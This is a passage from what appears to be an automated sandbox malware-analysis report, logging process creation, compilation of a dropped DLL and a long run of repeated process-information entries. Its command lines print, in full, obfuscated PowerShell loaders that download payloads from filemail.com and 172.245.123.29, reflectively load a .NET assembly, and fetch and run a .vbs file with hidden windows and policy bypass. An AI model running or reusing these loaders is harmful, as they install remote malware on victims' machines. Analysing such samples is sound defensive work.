NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.cmdline"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_04BA426B push ebx; ret 3_2_04BA42DA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_051A0F07 pushad ; retf 9_2_051A0F12
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_051A6F50 pushad ; iretd 9_2_051A6F51
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_051A0A91 push ebx; retf 9_2_051A0A92
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_051A12B0 push esp; retf 9_2_051A12B9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_051A0AD5 push esp; retf 9_2_051A0ADA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dk54el2n\dk54el2n.dllJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
